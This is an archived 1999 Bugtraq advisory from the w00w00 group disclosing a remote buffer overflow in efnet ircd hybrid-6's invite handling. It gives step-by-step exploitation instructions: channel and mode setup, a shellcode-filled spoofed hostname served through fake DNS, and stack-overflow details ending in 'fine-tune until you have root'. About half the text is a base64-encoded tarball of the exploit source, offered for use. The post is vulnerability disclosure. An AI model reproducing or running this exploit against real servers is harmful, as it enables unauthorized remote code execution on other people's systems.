![[LWN Logo]](/images/lwn.banner.gif)
Date: Fri, 13 Aug 1999 11:01:58 +0400
From: Shok <shok@CANNABIS.DATAFORCE.NET>
Subject: w00w00's efnet ircd advisory (exploit included)
To: BUGTRAQ@SECURITYFOCUS.COM
This message is in MIME format. The first part should be readable text,
while the remaining parts are likely unreadable without MIME-aware tools.
Send mail to mime@docserver.cac.washington.edu for more info.
--717427360-938467936-934527718=:12840
Content-Type: TEXT/PLAIN; charset=US-ASCII
[http://www.w00w00.org, comments to shok@dataforce.net]
SUMMARY
efnet ircd hybrid-6 (up to beta 58) have a vulnerability that can allow
remote access to the irc server. In most cases, you'll gain privileges of
the 'irc' user.
COMMENTS
This vulnerability was discovered by jduck and stranjer of w00w00 at
least 2 months ago. After discussing the vulnerability, it was reported
to Dianora by jduck and fixed. Hopefully the vulnerable irc servers have
been fixed. If not, it's unfortunate Dianora didn't notify the vulnerable
irc servers or they didn't take these 2 months to fix themselves (note:
we didn't wait that long on purpose.. we were just sidetracked with a
million other things).
DESCRIPTION
The vulnerability is in the invite handling code (m_invite). In a
channels with operators (ops) and modes +pi (paranoid + invite-only), a
channel invitation is reported to all other operators. The buffer used to
store the invitation notice can overflow its boundaries by up to 15
bytes.
Steps:
1. Client 1 (9chars!10chars@trivial) joins #199chars
2. Client 2 (trivial!trivial@trivial) joins #199chars
3. Client 1 sets mode #199chars +pio Client 2
4. Client 1 invites Client 3 (9chars!10chars@63chars) to #199chars
Note: client 1 and client 3 should _not_ be from the same host. With our
exploit, client 3 (compile/run hostname.c) first, then compile/run
ircdexp.c.
Client #1's server = vulnerable irc server (such as irc.arpa.com)
Client #2's server = trivial
Client #3's server = ComStud irc server (such as irc.prison.net), because
it allows shellcode chars in hostname
Using the following spoofed host (59 chars):
shellcodeshellcodeshellcodeshellcodeshellcodeshellcode.AAAA
[The ComStud ircd will check for a '.']
Here, EIP = 0x41414141 (AAAA). The other registers are negligable.
The hostlen is actually 63 bytes, but for this specific overflow, EIP is
overwritten at buf[54-58].
We have to take stdout/stdin descriptors into consideration. We are very
limited in size (only have 54 bytes for shellcode), so we can't fit bind
shellcode. Instead, we took the standard Linux x86 shellcode, dropped
exit handling code, added a close'd stdin, dup'd cptr->fd (cptr is the
first argument passed to m_invite). Since we only have 54 bytes to work
with, we can't fit code in to close stdout and dup cptr->fd, so output
will be sent to whatever terminald ircd was started from. If you do not
wish for the output to be seen, redirect everything (via '>') /dev/null.
As for how to go about spoofing, you have options:
1) Use the old DNS poison caching method
2) Use custom "fake binds" that will just pass on your shellcode as a
hostname in response to a DNS query (idea from nyt).
Option #2 is the approach we will take (hostname.c generates the shellcode
we'll use). This will work fine as long as you IP/hostname hasn't already
been cached. Because these "fake binds" are pretty popular (or have been
in the past), they should be easy to come by and are outside the scope of
this advisory.
So full steps are, client with the spoofed hostname, connect to a ComStud
ircd server (such as irc.prison.net), another client join the arbitrary
client, and another client join the target ircd hybrid-6 server (such as
irc.arpa.com). Once the channel is +pi (and your channel, ident,
username, etc. all the right length), invite the client with the spoofed
hostname. Fine-tune until you have root.
Thanks to: stranjer and jduck for their input and discovery of this
vulnerability.
People that deserve hellos: Mike (mike@eEye.com), vacuum
(vacuum@technotronic.com), awr (andrewr@rot26.net), dmess0r
(dmessor@el8.org).
-- Matt Conover (Shok) & w00w00 Security Team
--717427360-938467936-934527718=:12840
Content-Type: APPLICATION/octet-stream; name="ircdexp.tgz"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.3.95.990813110158.12840B@cannabis.dataforce.net>
Content-Description: ircd hyb6 exploit
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
Y4tgAFAAAA==
--717427360-938467936-934527718=:12840--